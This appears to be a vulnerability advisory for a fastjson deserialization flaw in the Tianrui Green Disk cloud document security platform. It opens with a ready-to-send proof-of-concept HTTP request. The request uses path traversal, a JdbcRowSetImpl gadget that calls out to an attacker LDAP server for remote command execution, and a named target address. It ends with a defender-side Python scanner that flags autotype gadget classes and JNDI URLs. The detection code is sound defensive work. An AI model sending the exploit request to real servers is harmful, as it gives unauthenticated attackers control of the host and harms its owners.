Vulnerability description
The Tianrui Green Disk (天锐绿盘) Cloud Document Security Management Platform from Xiamen Tianrui Technology Co., Ltd. (厦门天锐科技股份有限公司) contains a fastjson deserialization vulnerability; an unauthenticated attacker can exploit it to gain control of the server.
POST /lddsm/service/../ldfbsnodeDocumentController/restorMachineToClient.do HTTP/1.1
Host: 183.242.32.10:8180
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
cmd: dir
diskMatch={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://vpsip:1389/TomcatBypass/TomcatEcho","autoCommit":true}}&sourceUmId=1&destUmId=1
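A defender-side check, added here as an example and not part of the advisory: it decodes JSON-valued form parameters and flags fastjson autotype markers (an `@type` naming a known gadget class, or a string carrying a JNDI scheme), and it normalizes the `..` segment in the request path so URL-based rules match the resolved endpoint. The sample body and the `example.invalid` host are constructed for the test.

```python
import json
import posixpath
import re
from urllib.parse import parse_qs

# Constructed request body modelled on the advisory's PoC (hostname replaced).
SAMPLE_BODY = (
    'diskMatch={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://example.invalid:1389/x","autoCommit":true}}'
    '&sourceUmId=1&destUmId=1'
)

# Classes abused through fastjson's @type autotype (non-exhaustive list).
DANGEROUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl", "java.lang.Class"}
# URL schemes that trigger a JNDI lookup when placed in dataSourceName.
JNDI_SCHEME = re.compile(r"^(ldap|ldaps|rmi|iiop)://", re.IGNORECASE)


def _walk(node, findings, path):
    """Recursively inspect a decoded JSON value and record suspicious markers."""
    if isinstance(node, dict):
        type_name = node.get("@type")
        if type_name in DANGEROUS_TYPES:
            findings.append(f"{path}: @type {type_name}")
        for key, value in node.items():
            if isinstance(value, str) and JNDI_SCHEME.match(value):
                findings.append(f"{path}.{key}: JNDI URL {value}")
            _walk(value, findings, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            _walk(value, findings, f"{path}[{index}]")


def scan_form_body(body: str) -> list:
    """Return findings for every form parameter whose value is JSON with autotype markers."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            value = value.strip()
            if not value.startswith(("{", "[")):
                continue  # plain scalar parameter, nothing to deserialize
            try:
                parsed = json.loads(value)
            except ValueError:
                continue  # not JSON; fastjson would not parse it either
            _walk(parsed, findings, name)
    return findings


def normalize_request_path(path: str) -> str:
    """Collapse '.' and '..' segments so path-based rules see the resolved controller."""
    return posixpath.normpath(path)
```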